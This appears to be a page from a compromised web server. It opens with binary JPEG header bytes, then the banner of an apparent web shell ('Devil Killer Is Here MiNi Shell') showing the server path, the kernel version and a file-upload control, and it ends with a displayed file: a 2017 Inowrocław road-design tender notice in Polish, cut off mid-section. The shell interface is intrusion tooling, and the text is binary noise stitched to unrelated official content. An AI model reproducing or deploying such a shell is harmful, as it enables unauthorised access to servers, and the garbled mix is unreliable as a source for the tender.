JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170202/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170202/19011-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.bip.inowroclaw.pl' target='_blank'>http://www.bip.inowroclaw.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 19011 - 2017
              z dnia 2017-02-02 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Inowrocław: Wykonanie dokumentacji projektowych branży drogowej w Inowrocławiu<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Miasto Inowrocław, krajowy numer identyfikacyjny
              59636900000, ul.
              ul. F. D. Roosevelta 
              36,
              88100  
              Inowrocław, woj.
              kujawsko-pomorskie, państwo
              Polska, tel.
              523 555 250, e-mail
              zamowienia@inowroclaw.pl, faks
              523 555 233.
              <br />
              Adres strony internetowej (URL): www.bip.inowroclaw.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />www.bip.inowroclaw.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.bip.inowroclaw.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />forma pisemna<br />
                Adres:
                <br />88-100 Inowrocław, ul. Prezydenta Franklina Roosevelta 36</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Wykonanie dokumentacji projektowych branży drogowej w Inowrocławiu<br /><b>Numer referencyjny: </b>ZZP.271.1.5.2017<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>1. Przedmiotem zamówienia jest wykonanie dokumentacji projektowych branży drogowej w zakresie przebudowy i remontu ulic w Inowrocławiu. Zamówienie zostało podzielone na 4 części, w tym:
część 1  przebudowa ulicy Kościelskiego wraz z infrastrukturą towarzyszącą; 
część 2  tymczasowe utwardzenie nawierzchni ulic w Inowrocławiu, tj.: 
a) ul. Polnej (odcinek od ul. Kolejowej do ul. Wiejskiej),
b) ul. Kolejowej (odcinek od ul. Stanisława Przybyszewskiego w kierunku miasta),
c) ul. Droga do Lotniska, ul. Ikara, ul. Dedala, ul. Tadeusza Śliwaka, ul. Andrzeja Rakoczego, ul. Józefa Dankowskiego,
d) ul. Radosnej, ul. Szczęśliwej i ul. Szybowcowej (odcinek od ul. Rotmistrza Witolda Pileckiego w kierunku ulic: Radosnej i Szczęśliwej);
część 3  przebudowa alejek w parku na Osiedlu Piastowskim III; 
część 4  ułożenie nawierzchni bitumicznej ul. Bolesława Chrobrego.

2. Nie ogranicza się liczby części, na które wykonawca może składać ofertę.

3. Cz. 1 - przebudowa ulicy Kościelskiego wraz z infrastrukturą towarzyszącą w Inowrocławiu, długości 175 m (orientacyjny przebieg ulicy i zakres opracowania pokazany jest na załączonym do SIWZ planie). Przeznaczony do przebudowy odcinek ulicy posiada nawierzchnię gruntową.
 
1) Podstawowe wytyczne do projektowania:
a) nawierzchnia jezdni z kostki betonowej szarej gr. 8 cm i szerokości 6,0 m, 
b) chodnik strona lewa z kostki betonowej, szarej gr. 8 cm i szerokości 2,0 m,
c) stanowiska postojowe dla samochodów osobowych z kostki betonowej gr. 8 cm, kolor antracyt,
d) strona prawa pas zieleni do wykorzystania na chodnik i zjazdy po zabudowie tej strony,
e) zjazdy do posesji wyróżnić kostką innego koloru, np. czerwoną,
f) rozbudowa kanalizacji deszczowej, sanitarnej, sieci wodociągowej z wykonaniem przyłączy do granicy działek (posesji) - wg. warunków Przedsiębiorstwa Wodociągów i Kanalizacji Sp. z o.o. w Inowrocławiu;
g) budowa oświetlenia ulicy (ledowe);
h) regulacja lub przebudowa wszystkich urządzeń uzbrojenia technicznego w zależności od potrzeb;
2) w ramach przedmiotu zamówienia należy: 
a) przeprowadzić badania geotechniczne podłoża gruntowego;
b) wykonać inwentaryzację geodezyjną terenu;
c) przedstawić Zamawiającemu przed podpisaniem umowy harmonogram realizacji prac projektowych,
d) przedstawić Zamawiającemu, po upływie 1 miesiąca od zawarcia umowy, koncepcję przebudowy ulicy, a po jej uzgodnieniu przystąpić do dalszych prac projektowych;
e) złożyć w imieniu Zamawiającego wniosek do właściwego organu o wydanie decyzji o pozwoleniu na budowę lub zgłosić przebudowę (w zależności od rozwiązań projektowych);
f) wykonać: 
- projekt budowlany i projekty wykonawcze przebudowy ulicy wraz z kanalizacją deszczową, sanitarną, siecią wodociągową i oświetleniem, 
- projekt stałej i czasowej organizacji ruchu, 
- informację dla planu BIOZ dla robót będących przedmiotem zamówienia,                                  z uwzględnieniem wymagań ochrony środowiska naturalnego;
- kosztorys inwestorski i przedmiar robót (z podziałem na wszystkie branże),
- specyfikacje techniczne wykonania i odbioru robót budowlanych (z uwzględnieniem każdej branży).  

4. Cz. 2 - tymczasowe utwardzenie nawierzchni ulic w Inowrocławiu, tj.: 
1) ul. Polnej (odcinek od ul. Kolejowej do ul. Wiejskiej),
2) ul. Kolejowej (odcinek od ul. Stanisława Przybyszewskiego w kierunku miasta),
3) ul. Droga do Lotniska, ul. Ikara, ul. Dedala, ul. Tadeusza Śliwaka, ul. Andrzeja Rakoczego, ul. Józefa Dankowskiego,
4) ul. Radosnej, ul. Szczęśliwej i ul. Szybowcowej (odcinek od ul. Rotmistrza Witolda Pileckiego w kierunku ulic: Radosnej i Szczęśliwej).

Ad. 1) Ulica Polna  odcinek od skrzyżowania z ul. Kolejową do ul. Wielkopolskiej, długości ok. 378 m (orientacyjny przebieg ulicy i zakres opracowania pokazany jest na załączonym do SIWZ szkicu sytuacyjnym):  
Projekt tymczasowego utwardzenia powinien:
- uwzględniać wykonanie nawierzchni z masy MB szerokości 4,0 m z obustronną 0,5 m opaską z kamienia łamanego dla kategorii ruchu KR-2, bez chodników;
- zakładać odwodnienie powierzchniowe, które powinno być uzgodnione z Wydziałem Gospodarki Komunalnej, Środowiska i Rolnictwa;
- być uzgodniony z PKP S.A. w obrębie działki nr 59 oraz przejazdu kolejowego przy ul. Wiejskiej.
Wykonawca dokona w imieniu Zamawiającego zgłoszenia o przebudowie nawierzchni do właściwego organu.  
Ad. 2) ulica Kolejowa - odcinek od ul. Stanisława Przybyszewskiego w kierunku północnym - długości ok. 187 m (orientacyjny przebieg ulicy i zakres opracowania pokazany jest na załączonym do SIWZ szkicu sytuacyjnym):
Projekt tymczasowego utwardzenia nawierzchni powinien uwzględniać:
- wykonanie nawierzchni z masy MB szerokości 4,0 m z obustronną 0,5 m opaską z kamienia łamanego dla kategorii ruchu KR-2, bez chodników;
- elementy uspokojenia ruchu drogowego;
- wykonanie systemu odprowadzającego wody opadowe, zwłaszcza w początkowym przebiegu od ul. Stanisława Przybyszewskiego, gdzie tworzą się duże zastoiska wody, których przyczynami są: brak możliwości odprowadzenia wody na tereny przyległe, ulica po obu stronach posiada zabudowania, niższe położenie w stosunku do poziomu nawierzchni ul. Stanisława Przybyszewskiego i częściowe spływanie wody z ul. Stanisława Przybyszewskiego,
- opracowanie, zatwierdzenie i wprowadzenie zmiany organizacji ruchu. 
Wykonawca dokona w imieniu Zamawiającego zgłoszenia o przebudowie nawierzchni do właściwego organu.  
Ad. 3) Ulice: Droga do Lotniska, Ikara, Dedala, Tadeusza Śliwaka, Andrzeja Rakoczego, Józefa Dankowskiego skomunikowane są w kolejności odwrotnej z ulicą Toruńską (ostatnia ul. Józefa Dankowskiego)  ul. Droga do Lotniska o długości ok. 214 m, ul. Ikara o długości ok. 272 m, ul. Dedala o długości ok. 63 m, ul. Tadeusza Śliwaka o długości ok. 195 m, ul. Andrzeja Rakoczego o długości ok. 95 m, ul. Józefa Dankowskiego o długości ok. 137 m (orientacyjny przebieg ulic i zakres opracowania pokazany jest na załączonym do SIWZ szkicu sytuacyjnym): 
Projekt tymczasowego utwardzenia powinien uwzględniać:
- wykonanie nawierzchni z masy MB szerokości 4,0 m z obustronną 0,5 m opaską z kamienia łamanego dla kategorii ruchu KR-2, bez chodników,
- elementy uspokojenia ruchu drogowego;
- odwodnienie powierzchniowe, które powinno być uzgodnione z Wydziałem Gospodarki Komunalnej, Środowiska i Rolnictwa.
Wykonawca dokona w imieniu Zamawiającego zgłoszenia o przebudowie nawierzchni do właściwego organu.  
Ad. 4) Ulice: Radosna i Szczęśliwa poprzez odcinek ulicy Szybowcowej skomunikowane są z ulicą Rotmistrza Witolda Pileckiego  ul. Radosna o długości ok. 592 m, ul. Szczęśliwa o długości ok. 208 m, odcinek ulicy Szybowcowej o długości ok. 273 m (orientacyjny przebieg ulic i zakres opracowania pokazany jest na załączonym do SIWZ szkicu sytuacyjnym): 
Projekt tymczasowego utwardzenia powinien uwzględniać:
- wykonanie nawierzchni z masy MB szerokości 4,0 m z obustronną 0,5 m opaską z kamienia łamanego dla kategorii ruchu KR-2, bez chodników,
- elementy uspokojenia ruchu drogowego,
- odwodnienie powierzchniowe, które powinno być uzgodnione z Wydziałem Gospodarki Komunalnej, Środowiska i Rolnictwa.
Wykonawca dokona w imieniu Zamawiającego zgłoszenia o przebudowie nawierzchni do właściwego organu.  
5. Cz. 3 - przebudowa alejek w parku na Osiedlu Piastowskim III w Inowrocławiu, działka nr 130/20, arkusz 73, obręb 6 (z wyłączeniem zrealizowanych w 2016 r. chodników w obrębie pawilonu przy ul. Bolesława Krzywoustego). Długość wszystkich alejek wynosi ok. 1 066,00 m (orientacyjny przebieg alejek i zakres opracowania pokazany jest na załączonym do SIWZ szkicu sytuacyjnym). 
W zakres projektu wchodzi:
1) nawierzchnia alejek z masy bitumicznej,
2) chodniki i dojścia,
3) odwodnienie powierzchniowe.
Projektant powinien przewidzieć i uzgodnić drogi dowozu materiałów.

6. Cz. 4 - ułożenie nawierzchni bitumicznej ul. Bolesława Chrobrego (na odcinku od ul. Szymborskiej do ul. Kasztanowej) w Inowrocławiu (orientacyjny przebieg ulicy i zakres opracowania pokazany jest na załączonym do SIWZ szkicu sytuacyjnym).
Ulica Bolesława Chrobrego skomunikowana jest z jednej strony z ul. Szymborską, a z drugiej z ul. Kasztanową, o długości ok. 590 m, szerokości od ok. 6 do ok. 8 m.
W zakres projektu wchodzi: 
1) regulacja i wymiana krawężników (w miejscach tego wymagających), 
2) ułożenie nawierzchni bitumicznej poprzedzone frezowaniem,  
3) wymiana progów zwalniających na progi z kostki betonowej,
4) opracowanie projektu czasowej i stałej organizacji ruchu i uzgodnienie projektu w Starostwie Powiatowym. 
Projekty tymczasowego utwardzenia nawierzchni wszystkich przedmiotowych ulic powinien uwzględniać warunki techniczne zawarte w rozporządzeniu Ministra Transportu i Gospodarki Morskiej z dnia 02.03.1999 r. w sprawie warunków technicznych jakim powinny odpowiadać drogi publiczne i ich usytuowanie (Dz. U. Nr 43, poz. 430 ze zm.).

Wszystkie dokumentacje powinny być uzgodnione z Wydziałem Dróg i Transportu, a w zakresie odwodnienia z Wydziałem Gospodarki Komunalnej, Środowiska i Rolnictwa. <br /><br /><b>II.5) Główny kod CPV: </b>71320000-7<br /><b> Dodatkowe kody CPV:</b>71322000-1<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                tak
                <br />
                Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp:
                Przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt. 6 ustawy Pzp, polegających na powtórzeniu usług projektowych w rozszerzonym, w stosunku do podstawowego, zakresie.<br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px"><br /></div><br /><b>II.9) Informacje dodatkowe: </b>Okres, w którym realizowane będzie zamówienie (oddzielnie dla każdej części) określony został w załączniku I - informacje dotyczące ofert częściowych.
</div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                nie dotyczy<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                nie dotyczy<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                o udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:

- w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie, wykonali co najmniej dwie dokumentacje projektowe  wielobranżowe, budowy lub przebudowy dróg, o długości min. 100 m, w zakresie nawierzchni, kanalizacji deszczowej, sanitarnej, wodociągowej oraz oświetlenia (dotyczy wykonawców składających ofertę na cz. 1);
- w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie, wykonali co najmniej dwie dokumentacje projektowe  w zakresie budowy lub przebudowy lub remontu dróg (dotyczy wykonawców składających ofertę na cz. 2 lub cz. 2 i 3 lub cz. 2 i 3 i 4);
Wykonawcy składający ofertę na więcej części muszą spełniać łącznie warunki dotyczące danej części zamówienia.

- dysponują osobami posiadającymi uprawnienia budowlane do projektowania w specjalnościach: drogowej; instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych; instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych (dotyczy wykonawców składających ofertę na cz. 1); 
- dysponują osobą posiadającą uprawnienia budowlane do projektowania w specjalności drogowej (dotyczy wykonawców składających ofertę na cz. 2 lub cz. 2 i 3 lub cz. 2 i 3 i 4).<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 3 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">1) odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy;
2) oświadczenia wykonawcy o niezaleganiu z opłacaniem podatków i opłat lokalnych, o których mowa w ustawie z dnia 12 stycznia 1991 r. o podatkach i opłatach lokalnych (Dz. U. z 2016 r. poz. 716);
3) oświadczenia wykonawcy o przynależności albo braku przynależności do tej samej grupy kapitałowej; w przypadku przynależności do tej samej grupy kapitałowej wykonawca może złożyć wraz z oświadczeniem dokumenty bądź informacje potwierdzające, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu.
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />1) wykaz usług wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów określających czy te dostawy lub usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego dostawy lub usługi były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów  oświadczenie wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert; 
